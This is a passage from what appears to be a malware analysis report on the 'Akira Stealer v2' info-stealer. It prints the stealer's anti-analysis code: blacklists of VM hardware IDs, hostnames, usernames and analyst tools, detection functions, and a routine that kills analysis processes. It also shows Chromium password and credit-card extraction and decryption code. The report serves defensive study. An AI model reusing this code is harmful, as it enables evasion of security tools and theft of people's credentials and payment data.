Time",[12,9534,192],{},[12,9536,9537],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[56,9539,9541],{"className":8482,"code":9540,"language":8484,"meta":65,"style":65},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... 
dozens more ...\n  'glasswire','requestly'\n)\n",[63,9542,9543,9547,9552,9557,9561,9566,9571,9576,9581],{"__ignoreMap":65},[102,9544,9545],{"class":104,"line":105},[102,9546,8971],{},[102,9548,9549],{"class":104,"line":111},[102,9550,9551],{},"def killTasks() -> None:\n",[102,9553,9554],{"class":104,"line":329},[102,9555,9556],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[102,9558,9559],{"class":104,"line":346},[102,9560,7846],{"emptyLinePlaceholder":2180},[102,9562,9563],{"class":104,"line":650},[102,9564,9565],{},"BLACKLISTED_TASKS = (\n",[102,9567,9568],{"class":104,"line":656},[102,9569,9570],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[102,9572,9573],{"class":104,"line":662},[102,9574,9575],{},"  # ... dozens more ...\n",[102,9577,9578],{"class":104,"line":668},[102,9579,9580],{},"  'glasswire','requestly'\n",[102,9582,9583],{"class":104,"line":674},[102,9584,9238],{},[12,9586,9587],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[12,9589,9590],{},[251,9591,9592],{},"Summary",[12,9594,9595],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. 
These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[12,9597,9598],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[186,9600,9602],{"id":9601},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[12,9604,192],{},[12,9606,9607],{},[251,9608,9609],{},"Blacklisted Hardware UUIDs",[56,9611,9614],{"className":9612,"code":9613,"language":61},[59],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    
'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[63,9615,9613],{"__ignoreMap":65},[12,9617,9618],{},[251,9619,9620],{},"Blacklisted Computer Names",[56,9622,9625],{"className":9623,"code":9624,"language":61},[59],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[63,9626,9624],{"__ignoreMap":65},[12,9628,9629],{},[251,9630,9631],{},"Blacklisted User Accounts",[56,9633,9636],{"className":9634,"code":9635,"language":61},[59],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[63,9637,9635],{"__ignoreMap":65},[12,9639,9640],{},[251,9641,9642],{},"Blacklisted Analysis‐Tool Processes",[56,9644,9647],{"className":9645,"code":9646,"language":61},[59],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 
'requestly'\n)\n",[63,9648,9646],{"__ignoreMap":65},[12,9650,9651],{},[251,9652,9653],{},"Core Detection Methods",[56,9655,9657],{"className":8482,"code":9656,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        
\"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[63,9658,9659,9663,9667,9672,9676,9680,9685,9690,9695,9699,9703,9707,9711,9715,9719,9724,9729,9733,9737,9741,9746,9751,9755,9759,9763,9768,9773,9778,9783,9789,9794,9799,9804,9809,9814,9819,9825,9831,9837,9842,9847,9852,9857,9863,9868,9873,9878,9883,9888,9893,9899,9905,9911,9917,9922,9927,9933,9939,9945,9951,9956,9961,9967,9972,9977,9983,9989,9995,10000,10006,10012,10017,10023,10029,10034,10039,10044,10050],{"__ignoreMap":65},[102,9660,9661],{"class":104,"line":105},[102,9662,8971],{},[102,9664,9665],{"class":104,"line":111},[102,9666,9129],{},[102,9668,9669],{"class":104,"line":329},[102,9670,9671],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[102,9673,9674],{"class":104,"line":346},[102,9675,9134],{},[102,9677,9678],{"class":104,"line":650},[102,9679,9139],{},[102,9681,9682],{"class":104,"line":656},[102,9683,9684],{},"            \"wmic csproduct get uuid\",\n",[102,9686,9687],{"class":104,"line":662},[102,9688,9689],{},"            shell=True, 
capture_output=True\n",[102,9691,9692],{"class":104,"line":668},[102,9693,9694],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[102,9696,9697],{"class":104,"line":674},[102,9698,9159],{},[102,9700,9701],{"class":104,"line":680},[102,9702,9164],{},[102,9704,9705],{"class":104,"line":9019},[102,9706,9169],{},[102,9708,9709],{"class":104,"line":9025},[102,9710,7846],{"emptyLinePlaceholder":2180},[102,9712,9713],{"class":104,"line":9031},[102,9714,8971],{},[102,9716,9717],{"class":104,"line":9037},[102,9718,9199],{},[102,9720,9721],{"class":104,"line":9043},[102,9722,9723],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[102,9725,9726],{"class":104,"line":9049},[102,9727,9728],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,9730,9731],{"class":104,"line":9055},[102,9732,7846],{"emptyLinePlaceholder":2180},[102,9734,9735],{"class":104,"line":9061},[102,9736,8971],{},[102,9738,9739],{"class":104,"line":9067},[102,9740,9264],{},[102,9742,9743],{"class":104,"line":9073},[102,9744,9745],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[102,9747,9748],{"class":104,"line":9079},[102,9749,9750],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[102,9752,9753],{"class":104,"line":9085},[102,9754,7846],{"emptyLinePlaceholder":2180},[102,9756,9757],{"class":104,"line":9091},[102,9758,8971],{},[102,9760,9761],{"class":104,"line":9097},[102,9762,9332],{},[102,9764,9765],{"class":104,"line":9103},[102,9766,9767],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[102,9769,9771],{"class":104,"line":9770},26,[102,9772,9337],{},[102,9774,9776],{"class":104,"line":9775},27,[102,9777,9134],{},[102,9779,9781],{"class":104,"line":9780},28,[102,9782,9346],{},[102,9784,9786],{"class":104,"line":9785},29,[102,9787,9788],{},"            'GET', 
'http://ip-api.com/line/?fields=hosting'\n",[102,9790,9792],{"class":104,"line":9791},30,[102,9793,9361],{},[102,9795,9797],{"class":104,"line":9796},31,[102,9798,9159],{},[102,9800,9802],{"class":104,"line":9801},32,[102,9803,9370],{},[102,9805,9807],{"class":104,"line":9806},33,[102,9808,7846],{"emptyLinePlaceholder":2180},[102,9810,9812],{"class":104,"line":9811},34,[102,9813,8971],{},[102,9815,9817],{"class":104,"line":9816},35,[102,9818,9400],{},[102,9820,9822],{"class":104,"line":9821},36,[102,9823,9824],{},"    \"\"\"\n",[102,9826,9828],{"class":104,"line":9827},37,[102,9829,9830],{},"    Attempt TLS to random subdomain.\n",[102,9832,9834],{"class":104,"line":9833},38,[102,9835,9836],{},"    Failure → possible HTTPS interception/sandbox.\n",[102,9838,9840],{"class":104,"line":9839},39,[102,9841,9824],{},[102,9843,9845],{"class":104,"line":9844},40,[102,9846,9405],{},[102,9848,9850],{"class":104,"line":9849},41,[102,9851,9134],{},[102,9853,9855],{"class":104,"line":9854},42,[102,9856,9414],{},[102,9858,9860],{"class":104,"line":9859},43,[102,9861,9862],{},"        return True\n",[102,9864,9866],{"class":104,"line":9865},44,[102,9867,9159],{},[102,9869,9871],{"class":104,"line":9870},45,[102,9872,9370],{},[102,9874,9876],{"class":104,"line":9875},46,[102,9877,7846],{"emptyLinePlaceholder":2180},[102,9879,9881],{"class":104,"line":9880},47,[102,9882,8971],{},[102,9884,9886],{"class":104,"line":9885},48,[102,9887,9457],{},[102,9889,9891],{"class":104,"line":9890},49,[102,9892,9824],{},[102,9894,9896],{"class":104,"line":9895},50,[102,9897,9898],{},"    Look for VirtualBox/VMware in:\n",[102,9900,9902],{"class":104,"line":9901},51,[102,9903,9904],{},"    - Registry driver entries\n",[102,9906,9908],{"class":104,"line":9907},52,[102,9909,9910],{},"    - Video card name via WMIC\n",[102,9912,9914],{"class":104,"line":9913},53,[102,9915,9916],{},"    - Presence of VM-specific 
folders\n",[102,9918,9920],{"class":104,"line":9919},54,[102,9921,9824],{},[102,9923,9925],{"class":104,"line":9924},55,[102,9926,9462],{},[102,9928,9930],{"class":104,"line":9929},56,[102,9931,9932],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[102,9934,9936],{"class":104,"line":9935},57,[102,9937,9938],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[102,9940,9942],{"class":104,"line":9941},58,[102,9943,9944],{},"        shell=True, capture_output=True\n",[102,9946,9948],{"class":104,"line":9947},59,[102,9949,9950],{},"    )\n",[102,9952,9954],{"class":104,"line":9953},60,[102,9955,9477],{},[102,9957,9959],{"class":104,"line":9958},61,[102,9960,9932],{},[102,9962,9964],{"class":104,"line":9963},62,[102,9965,9966],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[102,9968,9970],{"class":104,"line":9969},63,[102,9971,9944],{},[102,9973,9975],{"class":104,"line":9974},64,[102,9976,9950],{},[102,9978,9980],{"class":104,"line":9979},65,[102,9981,9982],{},"    gpu = any(\n",[102,9984,9986],{"class":104,"line":9985},66,[102,9987,9988],{},"        x.lower() in subprocess.run(\n",[102,9990,9992],{"class":104,"line":9991},67,[102,9993,9994],{},"            \"wmic path win32_VideoController get name\",\n",[102,9996,9998],{"class":104,"line":9997},68,[102,9999,9689],{},[102,10001,10003],{"class":104,"line":10002},69,[102,10004,10005],{},"        ).stdout.decode().splitlines()[2].lower()\n",[102,10007,10009],{"class":104,"line":10008},70,[102,10010,10011],{},"        for x in (\"virtualbox\", \"vmware\")\n",[102,10013,10015],{"class":104,"line":10014},71,[102,10016,9950],{},[102,10018,10020],{"class":104,"line":10019},72,[102,10021,10022],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[102,10024,10026],{"class":104,"line":10025},73,[102,10027,10028],{},"    return (r1.returncode != 1 and r2.returncode != 1) 
or gpu or dirs\n",[102,10030,10032],{"class":104,"line":10031},74,[102,10033,7846],{"emptyLinePlaceholder":2180},[102,10035,10037],{"class":104,"line":10036},75,[102,10038,8971],{},[102,10040,10042],{"class":104,"line":10041},76,[102,10043,9551],{},[102,10045,10047],{"class":104,"line":10046},77,[102,10048,10049],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[102,10051,10053],{"class":104,"line":10052},78,[102,10054,9556],{},[186,10056,10058],{"id":10057},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[12,10060,192],{},[6086,10062,10063,10077,10090],{},[1258,10064,10065,10068,10069,10072,10073,10076],{},[251,10066,10067],{},"Initialization:"," Within the ",[63,10070,10071],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[63,10074,10075],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[1258,10078,10079,10082,10083,10086,10087,10089],{},[251,10080,10081],{},"Deep Inspection:"," If the initial test passes, it calls ",[63,10084,10085],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[63,10088,9317],{},", and registry artifact scanning.",[1258,10091,10092,10095,10096,10098,10099,10101],{},[251,10093,10094],{},"Abort Path:"," If any check returns ",[63,10097,8659],{},", indicating a virtual or analysis environment, the code executes ",[63,10100,8663],{},", terminating execution before any data collection or exfiltration routines.",[186,10103,10105],{"id":10104},"_7314-conclusion","7.3.14 Conclusion",[12,10107,192],{},[12,10109,6600,10110,10112,10113,10115],{},[63,10111,8607],{}," module in ",[4328,10114,4683],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. 
By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[41,10117,10119],{"id":10118},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[12,10121,47],{},[12,10123,10124,10125,4598,10128,10131],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[251,10126,10127],{},"Chromium-based",[251,10129,10130],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[12,10133,10134],{},[251,10135,10136],{},"1. Workspace Setup",[56,10138,10140],{"className":8482,"code":10139,"language":8484,"meta":65,"style":65},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[63,10141,10142,10147,10152,10157],{"__ignoreMap":65},[102,10143,10144],{"class":104,"line":105},[102,10145,10146],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[102,10148,10149],{"class":104,"line":111},[102,10150,10151],{},"os.makedirs(client_dir, exist_ok=True)\n",[102,10153,10154],{"class":104,"line":329},[102,10155,10156],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[102,10158,10159],{"class":104,"line":346},[102,10160,10161],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1255,10163,10164,10171,10174,10177,10180],{},[1258,10165,10166,10167],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine 
(%TEMP%\\DESKTOP-",[10168,10169,10170],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[1258,10172,10173],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[1258,10175,10176],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[1258,10178,10179],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files behind.",[1258,10181,10182],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[12,10184,10185],{},[251,10186,10187],{},"2. 
Supported Browsers",[1255,10189,10190,10233],{},[1258,10191,10192,10195],{},[251,10193,10194],{},"Chromium‑based",[1255,10196,10197,10200,10203,10206,10209,10212,10215,10218,10221,10224,10227,10230],{},[1258,10198,10199],{},"Google Chrome (Stable & SxS)",[1258,10201,10202],{},"Microsoft Edge",[1258,10204,10205],{},"Brave Browser",[1258,10207,10208],{},"Opera & Opera GX",[1258,10210,10211],{},"Chromium",[1258,10213,10214],{},"Comodo Dragon",[1258,10216,10217],{},"Epic Privacy Browser",[1258,10219,10220],{},"Iridium Browser",[1258,10222,10223],{},"UR Browser",[1258,10225,10226],{},"Vivaldi Browser",[1258,10228,10229],{},"Yandex Browser",[1258,10231,10232],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[1258,10234,10235,10238,10239,1289,10242,10253,10255,10256,10265,10267,10268,805,10271,10274],{},[251,10236,10237],{},"Firefox‑based"," (via ",[63,10240,10241],{},"GeckoDriver",[1255,10243,10244,10247,10250],{},[1258,10245,10246],{},"Mozilla Firefox",[1258,10248,10249],{},"Waterfox",[1258,10251,10252],{},"Pale Moon",[531,10254],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[56,10257,10259],{"className":8482,"code":10258,"language":8484,"meta":65,"style":65},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[63,10260,10261],{"__ignoreMap":65},[102,10262,10263],{"class":104,"line":105},[102,10264,10258],{},[531,10266],{},"It recursively checks for available browser profiles (e.g. ",[63,10269,10270],{},"Default",[63,10272,10273],{},"Profile 1",", etc.) 
and targets SQLite databases within those paths.",[186,10276,10278],{"id":10277},"_741-data-types-extracted","7.4.1 Data Types Extracted",[12,10280,192],{},[417,10282,420,10283],{"style":8673},[438,10284,10285,420,10298,420,10311,420,10323,420,10335,420,10347,420,10358],{},[426,10286,424,10287,424,10291,424,10295,420],{},[430,10288,10290],{"style":10289},"text-align: left; width: 22%;","Data Type",[430,10292,10294],{"style":10293},"text-align: left; width: 28%;","Source File",[430,10296,10297],{"style":8841},"Notes",[426,10299,424,10300,424,10303,424,10308,420],{},[443,10301,10302],{},"Saved Passwords",[443,10304,10305,10307],{},[63,10306,4597],{}," (Chromium)",[443,10309,10310],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[426,10312,424,10313,424,10316,424,10320,420],{"style":8697},[443,10314,10315],{},"Cookies",[443,10317,10318],{},[63,10319,10315],{},[443,10321,10322],{},"Can include session tokens, especially for Google/Facebook accounts",[426,10324,424,10325,424,10328,424,10332,420],{},[443,10326,10327],{},"Autofill Data",[443,10329,10330],{},[63,10331,4601],{},[443,10333,10334],{},"Addresses, emails, phone numbers, etc.",[426,10336,424,10337,424,10340,424,10344,420],{"style":8697},[443,10338,10339],{},"Credit Cards",[443,10341,10342],{},[63,10343,4601],{},[443,10345,10346],{},"Encrypted; requires master key",[426,10348,424,10349,424,10352,424,10355,420],{},[443,10350,10351],{},"Session Tokens",[443,10353,10354],{},"In-memory & cookies",[443,10356,10357],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[426,10359,424,10360,424,10363,424,10371,420],{"style":8697},[443,10361,10362],{},"History & URLs",[443,10364,10365,805,10368],{},[63,10366,10367],{},"History",[63,10369,10370],{},"Visited Links",[443,10372,10373],{},"Were also exfiltrated to the attacker",[52,10375],{"className":10376},[4854,4855],[12,10378,10379,10382],{},[251,10380,10381],{},"3. 
Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[186,10384,10386,10387,1289],{"id":10385},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[63,10388,10389],{},"Chromium.GetPasswords",[12,10391,192],{},[12,10393,10394],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[56,10396,10398],{"className":8482,"code":10397,"language":8484,"meta":65,"style":65},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[63,10399,10400,10405,10410,10415,10420,10425,10430,10435,10440,10445],{"__ignoreMap":65},[102,10401,10402],{"class":104,"line":105},[102,10403,10404],{},"for root, _, files in os.walk(self.BrowserPath):\n",[102,10406,10407],{"class":104,"line":111},[102,10408,10409],{},"    for file in files:\n",[102,10411,10412],{"class":104,"line":329},[102,10413,10414],{},"        
if file.lower() == \"login data\":\n",[102,10416,10417],{"class":104,"line":346},[102,10418,10419],{},"            # Copy DB → open → extract rows\n",[102,10421,10422],{"class":104,"line":650},[102,10423,10424],{},"            results = cursor.execute(\n",[102,10426,10427],{"class":104,"line":656},[102,10428,10429],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[102,10431,10432],{"class":104,"line":662},[102,10433,10434],{},"            ).fetchall()\n",[102,10436,10437],{"class":104,"line":668},[102,10438,10439],{},"            for url, user, pwd_blob in results:\n",[102,10441,10442],{"class":104,"line":674},[102,10443,10444],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[102,10446,10447],{"class":104,"line":680},[102,10448,10449],{},"                passwords.append((url, user, clear_pwd))\n",[1255,10451,10452,10465,10471,10479,10496],{},[1258,10453,10454,10457,10458,10460,10461,10464],{},[251,10455,10456],{},"Locates"," every ",[63,10459,4597],{}," SQLite database under the browser’s ",[63,10462,10463],{},"User Data"," folder.",[1258,10466,10467,10470],{},[251,10468,10469],{},"Copies"," to a temp file to avoid browser locks.",[1258,10472,10473,1062,10476,1014],{},[251,10474,10475],{},"SQL Query",[63,10477,10478],{},"SELECT origin_url, username_value, password_value FROM logins",[1258,10480,10481,10484,10485,10488,10489,1305,10492,10495],{},[251,10482,10483],{},"Decrypts"," each ",[63,10486,10487],{},"password_value"," blob via AES‑GCM (",[63,10490,10491],{},"v10",[63,10493,10494],{},"v11",") or Windows DPAPI fallback.",[1258,10497,10498,10501,10502,1014],{},[251,10499,10500],{},"Writes"," output to ",[63,10503,10504],{},"Passwords/\u003CBrowserName> Passwords.txt",[186,10506,10508,10509,1289],{"id":10507},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[63,10510,10511],{},"Chromium.GetCreditCards",[12,10513,192],{},[12,10515,10516],{},"Here, the stealer accesses 
stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[56,10518,10520],{"className":8482,"code":10519,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[63,10521,10522,10527,10532,10537,10542,10547],{"__ignoreMap":65},[102,10523,10524],{"class":104,"line":105},[102,10525,10526],{},"results = cursor.execute(\n",[102,10528,10529],{"class":104,"line":111},[102,10530,10531],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[102,10533,10534],{"class":104,"line":329},[102,10535,10536],{},").fetchall()\n",[102,10538,10539],{"class":104,"line":346},[102,10540,10541],{},"for month, year, enc_cc in results:\n",[102,10543,10544],{"class":104,"line":650},[102,10545,10546],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[102,10548,10549],{"class":104,"line":656},[102,10550,10551],{},"    ccs.append((cc_number, month, year))\n",[1255,10553,10554,10563,10570,10578],{},[1258,10555,10556,10559,10560,10562],{},[251,10557,10558],{},"Targets"," the ",[63,10561,4601],{}," SQLite stores under each profile.",[1258,10564,10565,1062,10567,1014],{},[251,10566,10475],{},[63,10568,10569],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[1258,10571,10572,540,10574,10577],{},[251,10573,10483],{},[63,10575,10576],{},"card_number_encrypted"," exactly like the password blobs.",[1258,10579,10580,10583,10584,1014],{},[251,10581,10582],{},"Outputs"," to 
